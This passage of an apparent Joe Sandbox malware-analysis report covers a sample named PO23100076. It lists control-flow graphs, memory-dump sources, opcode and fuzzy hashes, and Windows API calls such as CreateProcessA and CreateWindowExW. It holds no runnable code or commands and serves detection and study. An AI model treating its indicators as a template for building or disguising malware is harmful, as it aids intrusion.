6828b9e-6828d16 370->382 378 6828a80-6828a88 372->378 379 6828a7b 372->379 373->372 374->375 375->370 380 68293e2-68293ee 376->380 378->364 379->378 384 68293f0-6829477 380->384 385 682938d-68293af 380->385 381->382 383 6828b8c-6828b98 381->383 390 6828d18 382->390 391 6828d2c-6828e67 382->391 383->382 415 68295fc-6829605 384->415 388 68293b1 385->388 389 68293b6-68293df 385->389 388->389 389->380 390->391 395 6828d1a-6828d26 390->395 405 6828ecb-6828ee0 391->405 406 6828e69-6828e6d 391->406 396 6829041-6829047 392->396 397 6828fee-6829036 392->397 395->391 396->335 397->392 407 6828ee2 405->407 408 6828ee7-6828f08 405->408 406->405 409 6828e6f-6828e7e 406->409 407->408 412 6828f0a 408->412 413 6828f0f-6828f2e 408->413 414 6828ebd-6828ec3 409->414 412->413 420 6828f30 413->420 421 6828f35-6828f55 413->421 416 6828e80-6828e84 414->416 417 6828ec5-6828ec6 414->417 418 682960b-6829666 415->418 419 682947c-6829491 415->419 423 6828e86-6828e8a 416->423 424 6828e8e-6828eaf 416->424 422 6828f60 417->422 443 6829668-682969b 418->443 444 682969d-68296c7 418->444 425 6829493 419->425 426 682949a-68295f0 419->426 420->421 427 6828f57 421->427 428 6828f5c 421->428 422->345 423->424 429 6828eb1 424->429 430 6828eb6-6828eba 424->430 425->426 431 68294a0-68294e0 425->431 432 68294e5-6829525 425->432 433 682952a-682956a 425->433 434 682956f-68295af 425->434 447 68295f6 426->447 427->428 428->422 429->430 430->414 431->447 432->447 433->447 434->447 452 68296d0-682977c 443->452 444->452 447->415 452->338 457->315 458->315
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1277105916.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6820000_PO23100076.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'q$TJq$Teq$\ lw$pq$xbq
                                                • API String ID: 0-2278883514
                                                • Opcode ID: 6072df8d50169fe3fe572f62384826a36953412cf80640050c742100cdc43a9a
                                                • Instruction ID: fc9bffe0292147990e80bf551eb0aa1f5f61e29d39412935114314895926c78e
                                                • Opcode Fuzzy Hash: 6072df8d50169fe3fe572f62384826a36953412cf80640050c742100cdc43a9a
                                                • Instruction Fuzzy Hash: 24B2CE74E00629CFDB64CF69C984ADDBBB2BF89304F1581E9D509AB265DB319E81CF40

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 459 68203b8-6821a68 462 6821f4b-6821fb4 459->462 463 6821a6e-6821a73 459->463 470 6821fbb-6822043 462->470 463->462 464 6821a79-6821a96 463->464 464->470 471 6821a9c-6821aa0 464->471 512 682204e-68220ce 470->512 472 6821aa2-6821aac call 68203c8 471->472 473 6821aaf-6821ab3 471->473 472->473 475 6821ac2-6821ac9 473->475 476 6821ab5-6821abf call 68203c8 473->476 481 6821be4-6821be9 475->481 482 6821acf-6821aff 475->482 476->475 485 6821bf1-6821bf6 481->485 486 6821beb-6821bef 481->486 492 68222ce-68222e0 482->492 495 6821b05-6821bd8 call 68203d4 * 2 482->495 489 6821c08-6821c38 call 68203e0 * 3 485->489 486->485 488 6821bf8-6821bfc 486->488 491 6821c02-6821c05 488->491 488->492 489->512 513 6821c3e-6821c41 489->513 491->489 495->481 520 6821bda 495->520 527 68220d5-6822157 512->527 513->512 515 6821c47-6821c49 513->515 515->512 519 6821c4f-6821c84 515->519 519->527 528 6821c8a-6821c93 519->528 520->481 534 682215f-68221e1 527->534 529 6821df6-6821dfa 528->529 530 6821c99-6821cf3 call 68203e0 * 2 call 68203f0 * 2 528->530 533 6821e00-6821e04 529->533 529->534 577 6821d05 530->577 578 6821cf5-6821cfe 530->578 537 6821e0a-6821e10 533->537 538 68221e9-6822216 533->538 534->538 541 6821e12 537->541 542 6821e14-6821e49 537->542 552 682221d-682229d 538->552 547 6821e50-6821e56 541->547 542->547 551 6821e5c-6821e64 547->551 547->552 558 6821e66-6821e6a 551->558 559 6821e6b-6821e6d 551->559 610 68222a4-68222c6 552->610 558->559 564 6821ecf-6821ed5 559->564 565 6821e6f-6821e93 559->565 569 6821ed7-6821ef2 564->569 570 6821ef4-6821f22 564->570 595 6821e95-6821e9a 565->595 596 6821e9c-6821ea0 565->596 591 6821f2a-6821f36 569->591 570->591 582 6821d09-6821d0b 577->582 578->582 583 6821d00-6821d03 578->583 584 6821d12-6821d16 582->584 585 6821d0d 582->585 583->582 592 6821d24-6821d2a 584->592 593 6821d18-6821d1f 584->593 585->584 591->610 611 6821f3c-6821f48 591->611 597 6821d34-6821d39 592->597 598 6821d2c-6821d32 592->598 599 6821dc1-6821dc5 593->599 600 6821eac-6821ebf call 6822400 595->600 596->492 602 6821ea6-6821ea9 596->602 606 6821d3f-6821d45 597->606 598->606 607 6821dc7-6821de1 599->607 608 6821de4-6821df0 599->608 614 6821ec5-6821ecd 600->614 602->600 616 6821d47-6821d49 606->616 617 6821d4b-6821d50 606->617 607->608 608->529 608->530 610->492 614->591 620 6821d52-6821d64 616->620 617->620 626 6821d66-6821d6c 620->626 627 6821d6e-6821d73 620->627 628 6821d79-6821d80 626->628 627->628 631 6821d82-6821d84 628->631 632 6821d86 628->632 636 6821d8b-6821d96 631->636 632->636 637 6821dba 636->637 638 6821d98-6821d9b 636->638 637->599 638->599 640 6821d9d-6821da3 638->640 641 6821da5-6821da8 640->641 642 6821daa-6821db3 640->642 641->637 641->642 642->599 644 6821db5-6821db8 642->644 644->599 644->637
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1277105916.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6820000_PO23100076.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Hq$Hq$Hq$Hq$Hq
                                                • API String ID: 0-3799487529
                                                • Opcode ID: be3307563507acbe27794b8efe129a6f01ed1f01f6148cf206d4f0fe26bcff18
                                                • Instruction ID: e6c538febb3d3e38579f7f002d1fa5c538116dc82e21dd17725d3068f7070608
                                                • Opcode Fuzzy Hash: be3307563507acbe27794b8efe129a6f01ed1f01f6148cf206d4f0fe26bcff18
                                                • Instruction Fuzzy Hash: F9329030E002198FDB58DF68C85579EBBF2BF88300F248469D54AEB395DB349D85CB95

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 646 6828730-6828761 648 6828763 646->648 649 6828768-6828854 646->649 648->649 651 6829081-68290a9 649->651 652 682885a-6828978 649->652 655 682978b-6829794 651->655 691 6828984-68289ae 652->691 656 68290b7-68290c0 655->656 657 682979a-68297b1 655->657 659 68290c2 656->659 660 68290c7-68291a0 656->660 659->660 819 68291a6 call 68299e3 660->819 820 68291a6 call 68299f0 660->820 677 68291ac-68291b9 678 68291e3 677->678 679 68291bb-68291c7 677->679 683 68291e9-6829208 678->683 681 68291d1-68291d7 679->681 682 68291c9-68291cf 679->682 685 68291e1 681->685 682->685 688 682920a-6829263 683->688 689 6829268-68292e0 683->689 685->683 700 6829788 688->700 708 68292e2-6829335 689->708 709 6829337-682937a 689->709 696 68289b4-6828a0f 691->696 697 682904f-682907f 691->697 703 6828a11 696->703 704 6828a14-6828a1f 696->704 697->651 700->655 703->704 707 6828f63-6828f69 704->707 710 6828a24-6828a42 707->710 711 6828f6f-6828fec 707->711 738 6829385-682938b 708->738 709->738 715 6828a44-6828a48 710->715 716 6828a99-6828aae 710->716 754 6829039-682903f 711->754 715->716 720 6828a4a-6828a55 715->720 718 6828ab0 716->718 719 6828ab5-6828acb 716->719 718->719 723 6828ad2-6828ae9 719->723 724 6828acd 719->724 726 6828a8b-6828a91 720->726 730 6828af0-6828b06 723->730 731 6828aeb 723->731 724->723 727 6828a93-6828a94 726->727 728 6828a57-6828a5b 726->728 732 6828b17-6828b88 727->732 734 6828a61-6828a79 728->734 735 6828a5d 728->735 736 6828b08 730->736 737 6828b0d-6828b14 730->737 731->730 743 6828b8a 732->743 744 6828b9e-6828d16 732->744 740 6828a80-6828a88 734->740 741 6828a7b 734->741 735->734 736->737 737->732 742 68293e2-68293ee 738->742 740->726 741->740 746 68293f0-6829477 742->746 747 682938d-68293af 742->747 743->744 745 6828b8c-6828b98 743->745 752 6828d18 744->752 753 6828d2c-6828e67 744->753 745->744 777 68295fc-6829605 746->777 750 68293b1 747->750 751 68293b6-68293df 747->751 750->751 751->742 752->753 757 6828d1a-6828d26 752->757 767 6828ecb-6828ee0 753->767 768 6828e69-6828e6d 753->768 758 6829041-6829047 754->758 759 6828fee-6829036 754->759 757->753 758->697 759->754 769 6828ee2 767->769 770 6828ee7-6828f08 767->770 768->767 771 6828e6f-6828e7e 768->771 769->770 774 6828f0a 770->774 775 6828f0f-6828f2e 770->775 776 6828ebd-6828ec3 771->776 774->775 782 6828f30 775->782 783 6828f35-6828f55 775->783 778 6828e80-6828e84 776->778 779 6828ec5-6828ec6 776->779 780 682960b-6829666 777->780 781 682947c-6829491 777->781 785 6828e86-6828e8a 778->785 786 6828e8e-6828eaf 778->786 784 6828f60 779->784 805 6829668-682969b 780->805 806 682969d-68296c7 780->806 787 6829493 781->787 788 682949a-68295f0 781->788 782->783 789 6828f57 783->789 790 6828f5c 783->790 784->707 785->786 791 6828eb1 786->791 792 6828eb6-6828eba 786->792 787->788 793 68294a0-68294e0 787->793 794 68294e5-6829525 787->794 795 682952a-682956a 787->795 796 682956f-68295af 787->796 809 68295f6 788->809 789->790 790->784 791->792 792->776 793->809 794->809 795->809 796->809 814 68296d0-682977c 805->814 806->814 809->777 814->700 819->677 820->677
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1277105916.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6820000_PO23100076.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: TJq$Teq$xbq
                                                • API String ID: 0-4091408781
                                                • Opcode ID: 326ffa9032b389afccf40f11c0cb6e707225da276ed691585f4d809a8ff067d7
                                                • Instruction ID: 22c10c681b4e3ab9edae7dc9ac9bd97e7d4d8ffc64e6c5df8b1aaf60e4783738
                                                • Opcode Fuzzy Hash: 326ffa9032b389afccf40f11c0cb6e707225da276ed691585f4d809a8ff067d7
                                                • Instruction Fuzzy Hash: 13C17475E016688FDB68CF6AD944ADDBBF2BF88300F14C1A9D509AB364DB305A85CF50
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1277105916.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6820000_PO23100076.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d7096dbda80a1937ab1359970f3b0cc8158f5545cff49dd209fe59502dd9e8f7
                                                • Instruction ID: 15a388a33f0f8467963d10a249ee93fd76d87911caa2a0bc5cb6c99a24ef0bba
                                                • Opcode Fuzzy Hash: d7096dbda80a1937ab1359970f3b0cc8158f5545cff49dd209fe59502dd9e8f7
                                                • Instruction Fuzzy Hash: FFC17D31E002298FDB54DF69C88479EBBB2BF88300F14C5AAD959EB255DB30E984CF51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1277105916.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6820000_PO23100076.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b73c990851ad38623f7fa839dd3cc9b82c2d81cb15603464028b0ec78f63c9ed
                                                • Instruction ID: 714eec7162f991e1f373d991c787801b63975fdaa155820d0ba5295ad982c95f
                                                • Opcode Fuzzy Hash: b73c990851ad38623f7fa839dd3cc9b82c2d81cb15603464028b0ec78f63c9ed
                                                • Instruction Fuzzy Hash: 6CC16D31E002298FDB54DF69C88479EBBB2BF88300F14C5A9D959EB255DB30A985CF51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1275851820.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ae0000_PO23100076.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 531e9b692ac95d716d56c72aa4f044670809d4efecdbd0ca0655c8a920769531
                                                • Instruction ID: 9761780d730728b4ed8dbb19d64a91496a7ca637b21e31af7a8fc14be1ec2e5b
                                                • Opcode Fuzzy Hash: 531e9b692ac95d716d56c72aa4f044670809d4efecdbd0ca0655c8a920769531
                                                • Instruction Fuzzy Hash: A8A1BF74E103199FCB04DFA5D894AEDBBBAFF89300F558615E425AF264DB30E942CB90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1275851820.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ae0000_PO23100076.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 36fb58f5a483b7e565a13b191338d5963825dffe79b586fc531c5a734f32fe7d
                                                • Instruction ID: 9ccaa757a7b28edf81018fbc734db6f4bd9316b2b3af4d1c456513e99174f934
                                                • Opcode Fuzzy Hash: 36fb58f5a483b7e565a13b191338d5963825dffe79b586fc531c5a734f32fe7d
                                                • Instruction Fuzzy Hash: D191CF75E103099FCB05DFA5D844AEDBBBAFF99300F558215E415AF264EB30E941CB90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1275851820.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ae0000_PO23100076.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fdc503195803115c6e6eb469998b0a233d9f9b82cc5f11dd6aa8e39142d9f9bc
                                                • Instruction ID: b2987a193b2495ed0e37660a6005465365615350fac9ba58ad88a6cd5fa34852
                                                • Opcode Fuzzy Hash: fdc503195803115c6e6eb469998b0a233d9f9b82cc5f11dd6aa8e39142d9f9bc
                                                • Instruction Fuzzy Hash: 5981BD75E103099FCB01DFA1D844AEDBBBAFF99300F558255E425AF2A4EB30E981CB50
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1277105916.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6820000_PO23100076.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 65685ee013ab157b0596b5c422d47bd777abd770facc9b8b519bd3b1c3feacd3
                                                • Instruction ID: c58d3087dd8699452034c66aa452051eb144f0dc5d0eedefc9022b85a86d059b
                                                • Opcode Fuzzy Hash: 65685ee013ab157b0596b5c422d47bd777abd770facc9b8b519bd3b1c3feacd3
                                                • Instruction Fuzzy Hash: B221F8B1D056599FEB28CFAAC84179EFBF2BFC9304F14C06AC458A7255EB340A468F50
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1278385384.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6f00000_PO23100076.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3c2db27f822b65ee2494441ec0aaa67d750407409dcf16f4021e8d2988e43c8f
                                                • Instruction ID: 8f432fbaf36124dfb08c4cfa771a7a0d56cdcf9ebd9f47cfe8ca4f30815f3558
                                                • Opcode Fuzzy Hash: 3c2db27f822b65ee2494441ec0aaa67d750407409dcf16f4021e8d2988e43c8f
                                                • Instruction Fuzzy Hash: 4321F8B1D046589FEB19CF66C8143DEBFF6AFC9300F08C06AC409AA2A5DB740945CF50
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1277105916.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6820000_PO23100076.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9eafd19f35527583a0e67acdcf72d0eb4c276b50cd759216c79ad858c25e3d97
                                                • Instruction ID: e21510afd7bf00bfcdce4fb13576d181b203bcc449c9036450e032c7b60ff7b9
                                                • Opcode Fuzzy Hash: 9eafd19f35527583a0e67acdcf72d0eb4c276b50cd759216c79ad858c25e3d97
                                                • Instruction Fuzzy Hash: B621E971D056299BEB68CFABC84169EFBF7BFC8304F14D06AC419A7254EB341A468F50
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1278385384.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6f00000_PO23100076.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ea5b26d667e726ee5f4edf9437dbba0f780033b1af38abab5e1d7132265f5ac9
                                                • Instruction ID: 58353362da9102a99528fe12b9c10262e797021efb7ddedbe4935a73cd9c792a
                                                • Opcode Fuzzy Hash: ea5b26d667e726ee5f4edf9437dbba0f780033b1af38abab5e1d7132265f5ac9
                                                • Instruction Fuzzy Hash: 7621B2B1D046189BEB18CFABC8547EEFAB6BFC8300F04C06AD509A62A4DB740945CF94

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1027 6f05eb8-6f05f4d 1029 6f05f86-6f05fa6 1027->1029 1030 6f05f4f-6f05f59 1027->1030 1037 6f05fa8-6f05fb2 1029->1037 1038 6f05fdf-6f0600e 1029->1038 1030->1029 1031 6f05f5b-6f05f5d 1030->1031 1032 6f05f80-6f05f83 1031->1032 1033 6f05f5f-6f05f69 1031->1033 1032->1029 1035 6f05f6b 1033->1035 1036 6f05f6d-6f05f7c 1033->1036 1035->1036 1036->1036 1039 6f05f7e 1036->1039 1037->1038 1040 6f05fb4-6f05fb6 1037->1040 1044 6f06010-6f0601a 1038->1044 1045 6f06047-6f06101 CreateProcessA 1038->1045 1039->1032 1042 6f05fb8-6f05fc2 1040->1042 1043 6f05fd9-6f05fdc 1040->1043 1046 6f05fc4 1042->1046 1047 6f05fc6-6f05fd5 1042->1047 1043->1038 1044->1045 1048 6f0601c-6f0601e 1044->1048 1058 6f06103-6f06109 1045->1058 1059 6f0610a-6f06190 1045->1059 1046->1047 1047->1047 1049 6f05fd7 1047->1049 1050 6f06020-6f0602a 1048->1050 1051 6f06041-6f06044 1048->1051 1049->1043 1053 6f0602c 1050->1053 1054 6f0602e-6f0603d 1050->1054 1051->1045 1053->1054 1054->1054 1055 6f0603f 1054->1055 1055->1051 1058->1059 1069 6f061a0-6f061a4 1059->1069 1070 6f06192-6f06196 1059->1070 1072 6f061b4-6f061b8 1069->1072 1073 6f061a6-6f061aa 1069->1073 1070->1069 1071 6f06198 1070->1071 1071->1069 1075 6f061c8-6f061cc 1072->1075 1076 6f061ba-6f061be 1072->1076 1073->1072 1074 6f061ac 1073->1074 1074->1072 1077 6f061de-6f061e5 1075->1077 1078 6f061ce-6f061d4 1075->1078 1076->1075 1079 6f061c0 1076->1079 1080 6f061e7-6f061f6 1077->1080 1081 6f061fc 1077->1081 1078->1077 1079->1075 1080->1081 1083 6f061fd 1081->1083 1083->1083
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06F060EE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1278385384.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6f00000_PO23100076.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: eb746e1e4c78239a92a8f307b14b55a640236f3078e7e82f48bd33f80fac78b2
                                                • Instruction ID: d29ef060ef2c6a5a2a3d9588678b21fd17ebb7b377a6ff47d326e1601c01cfc4
                                                • Opcode Fuzzy Hash: eb746e1e4c78239a92a8f307b14b55a640236f3078e7e82f48bd33f80fac78b2
                                                • Instruction Fuzzy Hash: E6918A71D003198FEB60CFA8C841BEDBBB2BF48314F1485A9E809E7280DB759995DF91

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 970 6f05eaf-6f05f4d 972 6f05f86-6f05fa6 970->972 973 6f05f4f-6f05f59 970->973 980 6f05fa8-6f05fb2 972->980 981 6f05fdf-6f0600e 972->981 973->972 974 6f05f5b-6f05f5d 973->974 975 6f05f80-6f05f83 974->975 976 6f05f5f-6f05f69 974->976 975->972 978 6f05f6b 976->978 979 6f05f6d-6f05f7c 976->979 978->979 979->979 982 6f05f7e 979->982 980->981 983 6f05fb4-6f05fb6 980->983 987 6f06010-6f0601a 981->987 988 6f06047-6f06101 CreateProcessA 981->988 982->975 985 6f05fb8-6f05fc2 983->985 986 6f05fd9-6f05fdc 983->986 989 6f05fc4 985->989 990 6f05fc6-6f05fd5 985->990 986->981 987->988 991 6f0601c-6f0601e 987->991 1001 6f06103-6f06109 988->1001 1002 6f0610a-6f06190 988->1002 989->990 990->990 992 6f05fd7 990->992 993 6f06020-6f0602a 991->993 994 6f06041-6f06044 991->994 992->986 996 6f0602c 993->996 997 6f0602e-6f0603d 993->997 994->988 996->997 997->997 998 6f0603f 997->998 998->994 1001->1002 1012 6f061a0-6f061a4 1002->1012 1013 6f06192-6f06196 1002->1013 1015 6f061b4-6f061b8 1012->1015 1016 6f061a6-6f061aa 1012->1016 1013->1012 1014 6f06198 1013->1014 1014->1012 1018 6f061c8-6f061cc 1015->1018 1019 6f061ba-6f061be 1015->1019 1016->1015 1017 6f061ac 1016->1017 1017->1015 1020 6f061de-6f061e5 1018->1020 1021 6f061ce-6f061d4 1018->1021 1019->1018 1022 6f061c0 1019->1022 1023 6f061e7-6f061f6 1020->1023 1024 6f061fc 1020->1024 1021->1020 1022->1018 1023->1024 1026 6f061fd 1024->1026 1026->1026
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06F060EE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1278385384.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6f00000_PO23100076.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 10693e6691b95735b19d74559cd3649d3041d3eaba68dccedcdcdd9aa17c19f0
                                                • Instruction ID: 3771a92f474074cb8bfb06ad70f71b753804b2336bdb73cf452ac8b70851ab57
                                                • Opcode Fuzzy Hash: 10693e6691b95735b19d74559cd3649d3041d3eaba68dccedcdcdd9aa17c19f0
                                                • Instruction Fuzzy Hash: 36916B71D003198FEB64CF68C841BEDBBB2BF48314F1485A9E809E7280DB759995DF91

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1084 4ae3928-4ae427e 1086 4ae4289-4ae4290 1084->1086 1087 4ae4280-4ae4286 1084->1087 1088 4ae429b-4ae433a CreateWindowExW 1086->1088 1089 4ae4292-4ae4298 1086->1089 1087->1086 1091 4ae433c-4ae4342 1088->1091 1092 4ae4343-4ae437b 1088->1092 1089->1088 1091->1092 1096 4ae437d-4ae4380 1092->1096 1097 4ae4388 1092->1097 1096->1097 1098 4ae4389 1097->1098 1098->1098
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04AE432A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1275851820.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ae0000_PO23100076.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: bb73f0a148ce148ac2aa7e63185526006a50371a6de6e7c582211e274f6e72db
                                                • Instruction ID: 8849facef513db112f193e35f8d13b11cc1f79888946744e810b023c3a5b6f91
                                                • Opcode Fuzzy Hash: bb73f0a148ce148ac2aa7e63185526006a50371a6de6e7c582211e274f6e72db
                                                • Instruction Fuzzy Hash: D151C0B1D00349DFDB14CF9AC884AEEBBB5FF48310F25812AE819AB211D775A845CF90

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1099 4ae420d-4ae427e 1100 4ae4289-4ae4290 1099->1100 1101 4ae4280-4ae4286 1099->1101 1102 4ae429b-4ae42d3 1100->1102 1103 4ae4292-4ae4298 1100->1103 1101->1100 1104 4ae42db-4ae433a CreateWindowExW 1102->1104 1103->1102 1105 4ae433c-4ae4342 1104->1105 1106 4ae4343-4ae437b 1104->1106 1105->1106 1110 4ae437d-4ae4380 1106->1110 1111 4ae4388 1106->1111 1110->1111 1112 4ae4389 1111->1112 1112->1112
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04AE432A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1275851820.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ae0000_PO23100076.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: dad65cddf3679bca08bf1098f3712d10fa62339e16e762070c16342eefefcdd5
                                                • Instruction ID: 9d256e349a3e97a6a7bddfb5c2062ac01532c59b079f93f8656f285de4206393
                                                • Opcode Fuzzy Hash: dad65cddf3679bca08bf1098f3712d10fa62339e16e762070c16342eefefcdd5
                                                • Instruction Fuzzy Hash: 1D51D2B5D00349DFDF14CF9AC884ADDBBB5BF48310F24822AE419AB251D775A845CF40

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1113 4ae3a7c-4ae681c 1116 4ae68cc-4ae68ec call 4ae3954 1113->1116 1117 4ae6822-4ae6827 1113->1117 1125 4ae68ef-4ae68fc 1116->1125 1118 4ae687a-4ae68b2 CallWindowProcW 1117->1118 1119 4ae6829-4ae6860 1117->1119 1121 4ae68bb-4ae68ca 1118->1121 1122 4ae68b4-4ae68ba 1118->1122 1126 4ae6869-4ae6878 1119->1126 1127 4ae6862-4ae6868 1119->1127 1121->1125 1122->1121 1126->1125 1127->1126
                                                APIs
                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 04AE68A1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1275851820.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ae0000_PO23100076.jbxd
                                                Similarity
                                                • API ID: CallProcWindow
                                                • String ID:
                                                • API String ID: 2714655100-0
                                                • Opcode ID: 5c520ee487529dbfd28da0197644fd58eb253382e16f969559b7ebe6dd3b8c0f
                                                • Instruction ID: 7635293df1e28bdb65d40dd181b6e47f4e5452e2e29a8a6f7aeeb1a8f4c91616
                                                • Opcode Fuzzy Hash: 5c520ee487529dbfd28da0197644fd58eb253382e16f969559b7ebe6dd3b8c0f
                                                • Instruction Fuzzy Hash: 4A4129B5900305CFDB14DF96C448BAABBF5FB98314F148859D519A7321D734A845CFA1

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1130 2585d10-25871d1 CreateActCtxA 1133 25871da-2587234 1130->1133 1134 25871d3-25871d9 1130->1134 1141 2587243-2587247 1133->1141 1142 2587236-2587239 1133->1142 1134->1133 1143 2587258 1141->1143 1144 2587249-2587255 1141->1144 1142->1141 1146 2587259 1143->1146 1144->1143 1146->1146
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 025871C1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1272900380.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2580000_PO23100076.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 103166cb6cfece245cc78e7ebd7935e26daab89b5036c21b725495f4ab7f1f25
                                                • Instruction ID: 0e9eba907f716834f43bd7c1a3d33ef0f2346c74d7f215e7cd6a4bf8fb7d0515
                                                • Opcode Fuzzy Hash: 103166cb6cfece245cc78e7ebd7935e26daab89b5036c21b725495f4ab7f1f25
                                                • Instruction Fuzzy Hash: DB41E1B4D00719CBEB24DFA9C844B9DFBB5BF48304F20806AD409BB251DBB5A946CF91
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 025871C1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1272900380.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2580000_PO23100076.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
